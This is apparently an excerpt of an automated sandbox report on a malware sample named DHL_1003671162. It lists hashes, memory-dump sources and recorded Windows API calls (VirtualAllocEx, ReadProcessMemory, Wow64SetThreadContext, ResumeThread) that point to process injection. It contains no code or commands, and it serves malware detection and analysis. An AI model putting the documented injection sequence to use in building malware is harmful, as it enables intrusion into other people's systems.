                                                • Opcode ID: 6d97b4505e01cc9b2d088794282533fe1b87fa138a0a2b7a9b35f3ad619c3c44
                                                • Instruction ID: 3d4c5d2857949935155e7a0a1dff2b9fe7f000948726c877814601706f0de842
                                                • Opcode Fuzzy Hash: 6d97b4505e01cc9b2d088794282533fe1b87fa138a0a2b7a9b35f3ad619c3c44
                                                • Instruction Fuzzy Hash: EC2136B19003599FDB10DFA9C885BDEBBF5FF48314F10842AE958A7250C778A984CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0289D367
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1690251011.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2890000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 65df9daf47508bbed1438fd6bce102af85bbb6ef9a36f6a352d65e1d0ca72f0e
                                                • Instruction ID: 837a084a3a7372fa263889fa4342c845cb2b285c20d3f18a812041ca52da4e58
                                                • Opcode Fuzzy Hash: 65df9daf47508bbed1438fd6bce102af85bbb6ef9a36f6a352d65e1d0ca72f0e
                                                • Instruction Fuzzy Hash: 7D21E3B59003089FDB10CFAAD584ADEBFF4FB48324F14802AE958A7310D374A955CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0AE87B10
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1707211800.000000000AE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_ae80000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 862f4335b8115cf19261721dd0e409725ca5450875930df5705c8d03f9a89e6c
                                                • Instruction ID: 76fd236987defdc5ec6f823eedf5226168a940e41161129849e9a3f47c54e4be
                                                • Opcode Fuzzy Hash: 862f4335b8115cf19261721dd0e409725ca5450875930df5705c8d03f9a89e6c
                                                • Instruction Fuzzy Hash: 332136B1D002499FDB10DFA9C881AEEBBF1FF88314F108429E598A7250C7389945CF65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0AE87886
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1707211800.000000000AE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_ae80000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: b1aa71e98e6e39f851709df55521f508ae84c1d0b3ec939a1ef906c39f13b5cc
                                                • Instruction ID: 30b6f4770919aefbb384885b092b6b145712a5906fd617803f95f8e508ee7035
                                                • Opcode Fuzzy Hash: b1aa71e98e6e39f851709df55521f508ae84c1d0b3ec939a1ef906c39f13b5cc
                                                • Instruction Fuzzy Hash: CF2157B1D002488FDB10DFAAC4857EEBFF0AF88314F248429D499A7241CB78A945CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0AE87B10
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1707211800.000000000AE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_ae80000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0AE87886
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1707211800.000000000AE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_ae80000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0289D367
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1690251011.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2890000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0289B3D1,00000800,00000000,00000000), ref: 0289B5C2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1690251011.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2890000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0289B3D1,00000800,00000000,00000000), ref: 0289B5C2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1690251011.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2890000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0AE8794E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1707211800.000000000AE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_ae80000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0AE8794E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1707211800.000000000AE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_ae80000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ResumeThread.KERNELBASE(?), ref: 0AE87382
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1707211800.000000000AE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_ae80000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ResumeThread.KERNELBASE(?), ref: 0AE87382
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1707211800.000000000AE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_ae80000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0AE8BF35
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1707211800.000000000AE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_ae80000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0289AF56
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1690251011.0000000002890000.00000040.00000800.00020000.00000000.sdmp, Offset: 02890000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2890000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0AE8BF35
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1707211800.000000000AE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_ae80000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Te^q
                                                • API String ID: 0-671973202
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: O};5
                                                • API String ID: 0-3558557551
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: O};5
                                                • API String ID: 0-3558557551
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Te^q
                                                • API String ID: 0-671973202
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                • Opcode Fuzzy Hash: af32a84f25423addaac0c212a330d695fc4a2364672166ca2b57501866de7303
                                                • Instruction Fuzzy Hash: 2641ABB5A1420ACFCB25CFA8D8807EABBF0FF0A310F51422AE915E7295D334D955CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 274e2dae1368623995fb92512ad4120f750ceb7cc1cd4aa7f42a90c1f300abb4
                                                • Instruction ID: 32252997156b77e649977d0fe08904a22e885004472c1611530e35750e8a0f38
                                                • Opcode Fuzzy Hash: 274e2dae1368623995fb92512ad4120f750ceb7cc1cd4aa7f42a90c1f300abb4
                                                • Instruction Fuzzy Hash: 423103F4920151EBC7298B69C4043F9B7A2FF47309F5A81A7E4758F2C6C73A94A2CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1689920510.00000000027FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 027FD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_27fd000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a62d6c3471321b5088a30ad12c068602790e64140abc9b0fae6b50b4ea7803fb
                                                • Instruction ID: 058b70ac1a4f86e8f42be4c064726d288580abaa3c043ebb803c13382692ae43
                                                • Opcode Fuzzy Hash: a62d6c3471321b5088a30ad12c068602790e64140abc9b0fae6b50b4ea7803fb
                                                • Instruction Fuzzy Hash: 7E2125B1508200EFDB69DF14D9C0B26BF65FB98324F20C569EE094B356C336E456C6A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b141acb15cd556a76061242476962238852135012d9227fc13d5095ca3cf7c52
                                                • Instruction ID: 0b7859b782f69fdc96eb1691ba0b2eecff4c5dae14235e3d5d211822473067ac
                                                • Opcode Fuzzy Hash: b141acb15cd556a76061242476962238852135012d9227fc13d5095ca3cf7c52
                                                • Instruction Fuzzy Hash: 582105B1A083855FC732DB798C408BFBFB6EEC5160708456AE855DB692DB309905C3A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5e4c9c2eefe4ec7aa7a9710e1f23aab6a462caf7a3c85c4fbb35bb56d949bc8d
                                                • Instruction ID: efeff9743476862443b167d8ff7ff87480dbf4d167adf57675151ea300c3828f
                                                • Opcode Fuzzy Hash: 5e4c9c2eefe4ec7aa7a9710e1f23aab6a462caf7a3c85c4fbb35bb56d949bc8d
                                                • Instruction Fuzzy Hash: 131184B560E3849FCB16DB749C564EE7FF89F4210471444EAE844CB692EA349D0587A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1689984665.000000000280D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0280D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_280d000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d9113bcb023a57cd06e1811510355a6e95aa8d2f8a6cc0c21863ecc0d2d35a06
                                                • Instruction ID: 796afd199c3d146bffbae9e05881362370fe52e6f227509be1b7154fb97d76e5
                                                • Opcode Fuzzy Hash: d9113bcb023a57cd06e1811510355a6e95aa8d2f8a6cc0c21863ecc0d2d35a06
                                                • Instruction Fuzzy Hash: 1121047D504204DFDB44DF94D9C4B26BBA5FB84318F24C56DE90D8B2D6C33AD846CA61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1689984665.000000000280D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0280D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_280d000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e6f4bf7b033c2323dd7832b4e561c8f6dc0ec9a110bdf5a6fe7dfffe026b6f4e
                                                • Instruction ID: 0fda07203eaac2a8b34799fd146809d6dfe744d24ad7ba2d31349cd142499c22
                                                • Opcode Fuzzy Hash: e6f4bf7b033c2323dd7832b4e561c8f6dc0ec9a110bdf5a6fe7dfffe026b6f4e
                                                • Instruction Fuzzy Hash: 3321047D504304DFDB45DF94C9C0B26BBA5FB88318F20C56DE80D8B296C73AE846CA61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 00e43a2c72b8424e1bb39f58302d5e043497273ec3de8c27c3c698fce180e66f
                                                • Instruction ID: db2773adfce2d6c814aed158d596762b60483d224d49f95db90c3593896a78ee
                                                • Opcode Fuzzy Hash: 00e43a2c72b8424e1bb39f58302d5e043497273ec3de8c27c3c698fce180e66f
                                                • Instruction Fuzzy Hash: EB31C3B0D05218DFDB20DF99C588BDEBBF4EB08314F248459E408BB690C7B59945CF96
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ff65180dd7ec173553630bac72ac573149836e622490cc83085d772a6ac3005d
                                                • Instruction ID: d288b6098cda00c7fa68728908f383beed55336aa11d7771991748e570dd1925
                                                • Opcode Fuzzy Hash: ff65180dd7ec173553630bac72ac573149836e622490cc83085d772a6ac3005d
                                                • Instruction Fuzzy Hash: 9331E0B0D15258DFDB20DF99C584BCEBFF4AB08314F24805AE448BB690C7B59945CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 60fb20340e1d4a4ac16ba74a795e3d52a229b659108428c173001b58d2b133bb
                                                • Instruction ID: 137f39bae1dbd8004b039a2760579fe38cff25ceb566ade33bea3a6a30937ba6
                                                • Opcode Fuzzy Hash: 60fb20340e1d4a4ac16ba74a795e3d52a229b659108428c173001b58d2b133bb
                                                • Instruction Fuzzy Hash: 2E2190B4A10908DFC704CF5AE084999BBF1FF8C310F5290D5D848AB365EB35E991CB05
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4423fcac244bca3fc946dc8a1fc6b6ba238b6c700d04e033c60679ef0e874203
                                                • Instruction ID: 3d674ec847eaca4ef54ee161af5de826936d59da98930478623b391d6f403119
                                                • Opcode Fuzzy Hash: 4423fcac244bca3fc946dc8a1fc6b6ba238b6c700d04e033c60679ef0e874203
                                                • Instruction Fuzzy Hash: 2821F2B59003499FCB20CFAAD984ADEBFF4FB48310F50842AE958A7250D374A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1689920510.00000000027FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 027FD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_27fd000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                • Instruction ID: 3b9592fcf80b72ccd7c361b5fa12bed48f0854991352c3f58f65ef9a10dcc309
                                                • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                • Instruction Fuzzy Hash: 5711B176508240DFCB16CF10D5C4B16BF72FB98324F24C6A9DD094B656C336D45ACBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1689984665.000000000280D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0280D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_280d000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction ID: 214335f8d3eedb65ec0a818ffaf1a8c4084c386dce558fe3a9ff355215cd89ae
                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction Fuzzy Hash: 17118E7A504640DFDB05CF54D9C4B15BF61FB84218F24C6A9D8498B696C33AE44ACB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1689984665.000000000280D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0280D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_280d000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction ID: d42323485af734c2c8c7d50f1452f338a75077daa52974416849817d84063e7f
                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction Fuzzy Hash: FC11D079504240CFCB01CF50C9C4B15BF61FB88318F24C6A9D84D8B296C33AE40ACB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 210cc7e23e718c08b17c5654ace5405c9cc3cdbfa65cdd2813cb9302a169dd84
                                                • Instruction ID: 304393e196f9780e62d666f1021a4a9033dc138a1ee13d079a4dc83e7825ff42
                                                • Opcode Fuzzy Hash: 210cc7e23e718c08b17c5654ace5405c9cc3cdbfa65cdd2813cb9302a169dd84
                                                • Instruction Fuzzy Hash: 8E011A79A04248AFC745DFA9C588A9DBFF1AF48310F05C0D9D8489B366DB34DA40CF40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e60bbfd600daebf0683f714ca884ae64c8a1de5fa10573fa92c127102d21cd2b
                                                • Instruction ID: 08471c799d9ece369b18c582ac5259bfd8ec33fee31fdac45bf5e7c821d23908
                                                • Opcode Fuzzy Hash: e60bbfd600daebf0683f714ca884ae64c8a1de5fa10573fa92c127102d21cd2b
                                                • Instruction Fuzzy Hash: 77F090B2209108AF9B15DB68EC418EABFADEF45224B0481A7E404D7261E630A94187A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ab3a9e01ddcc2824a2d9f672331fdf097bad5c6d7d8f142860eafbff0e21a51f
                                                • Instruction ID: a639452c975c0c06281589074b9f14d0aacd0faf242210d04a0f5b0b95ec8a33
                                                • Opcode Fuzzy Hash: ab3a9e01ddcc2824a2d9f672331fdf097bad5c6d7d8f142860eafbff0e21a51f
                                                • Instruction Fuzzy Hash: F7016674A00208AFDB44DFA9D589A9DBFF1AF48310F15D095E9199B365DB35D940CF40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8d1443d25aa1abab75e53b7749a4f0327535aedf252bf3619564896e6f4318c5
                                                • Instruction ID: fc53b39d5c8732faa76f3e349d12bea84b27e5a01fa52bf331b65620cd15beb0
                                                • Opcode Fuzzy Hash: 8d1443d25aa1abab75e53b7749a4f0327535aedf252bf3619564896e6f4318c5
                                                • Instruction Fuzzy Hash: 25F05F74916218CFCB65CF64C984AD8BBB1FB09301F4011D6E80AA3210DB30AE81CF00
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c23f261b8e25ba8932a7b59aa05dfe11cfe20807f8d38fcf6c4b3a9282a89692
                                                • Instruction ID: 14416af441efda1088c323792121a217a875964708c6b90aea3d39a264bcb0b7
                                                • Opcode Fuzzy Hash: c23f261b8e25ba8932a7b59aa05dfe11cfe20807f8d38fcf6c4b3a9282a89692
                                                • Instruction Fuzzy Hash: 03E08CB0625344CFCB29CFB1C0418E8BB76FF49361F21219AD807AB2A4C739D991CE04
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 98cb7e3ae94cc59d70e24b9bbcab55e37a2a1ca83e6e44b4aef16ee433c1f2ed
                                                • Instruction ID: 1227a5b920f6cdd3f65bc3f4442319cb4124a55c5f4bf389d09cf61c31383743
                                                • Opcode Fuzzy Hash: 98cb7e3ae94cc59d70e24b9bbcab55e37a2a1ca83e6e44b4aef16ee433c1f2ed
                                                • Instruction Fuzzy Hash: 7FE0C2B04097478FC301DBB8E50AAA5BFB8EB02300B202186D804C70A1D7705260CB19
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4c2699a840a3b85b39f7ccc370e45fa292134f06c8f0cf2f393b63b9d2e76b59
                                                • Instruction ID: 3fc8a8434f9cef303d42b79e7bd4bb7b103a0ca06ef5d068c055fdcaea0aa2d9
                                                • Opcode Fuzzy Hash: 4c2699a840a3b85b39f7ccc370e45fa292134f06c8f0cf2f393b63b9d2e76b59
                                                • Instruction Fuzzy Hash: 7FE08C70511344CFCB64DFA1C445599BB71FF44340B1010A6DC16DF268D33A8A81CF10
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Execution Graph

